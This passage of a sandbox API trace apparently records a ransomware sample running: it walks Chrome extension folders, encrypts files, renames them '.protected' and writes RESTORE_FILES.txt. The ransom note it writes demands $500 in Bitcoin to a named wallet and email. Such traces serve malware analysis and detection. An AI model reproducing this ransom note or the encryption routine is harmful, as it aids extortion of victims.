lpOverlapped=0x0) returned 1 [0078.852] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0078.852] CloseHandle (hObject=0x164) returned 1 [0078.852] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.protected") returned 170 [0078.852] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0078.852] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0078.852] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0078.852] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.852] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0078.852] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0078.852] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0078.852] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0078.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.853] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0078.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.853] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0078.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0078.853] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0078.853] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0078.854] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.854] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0078.854] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.854] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0078.854] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0078.855] CloseHandle (hObject=0x164) returned 1 [0078.855] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.protected") returned 172 [0078.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json.protected")) returned 1 [0078.855] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0078.855] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0078.855] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0078.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.861] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.861] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0078.862] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.862] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0078.862] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.862] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0078.862] CloseHandle (hObject=0x160) returned 1 [0078.862] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0078.862] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0078.862] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\RESTORE_FILES.txt") returned 147 [0078.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0078.863] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.863] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0078.863] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.863] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.863] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.863] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0078.864] CloseHandle (hObject=0x15c) returned 1 [0078.865] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0078.865] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0078.865] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\RESTORE_FILES.txt") returned 141 [0078.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.866] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.866] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0078.866] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.866] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0078.866] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.866] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0078.866] CloseHandle (hObject=0x158) returned 1 [0078.867] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="Windows") returned -1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="Program Files") returned -1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="Program Files (x86)") returned -1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="$Recycle.bin") returned 1 [0078.867] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="System Volume Information") returned -1 [0078.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 123 [0078.867] lstrcmpW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0078.867] lstrcmpW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0078.867] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*") returned 125 [0078.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0078.867] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.867] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.867] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.867] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.867] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.867] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\.") returned 125 [0078.867] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.867] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.867] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.867] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.867] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.867] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.867] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.867] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\..") returned 126 [0078.868] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.868] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.868] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="Windows") returned -1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files") returned -1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="Program Files (x86)") returned -1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="$Recycle.bin") returned 1 [0078.868] lstrcmpiW (lpString1="0.9_0", lpString2="System Volume Information") returned -1 [0078.868] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 129 [0078.868] lstrcmpW (lpString1="0.9_0", lpString2=".") returned 1 [0078.868] lstrcmpW (lpString1="0.9_0", lpString2="..") returned 1 [0078.868] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*") returned 131 [0078.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0078.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.881] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.881] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.881] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.881] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.881] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\.") returned 131 [0078.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.881] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.881] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.881] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.881] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.881] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.881] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\..") returned 132 [0078.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.881] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.881] lstrcmpiW (lpString1="icon_128.png", 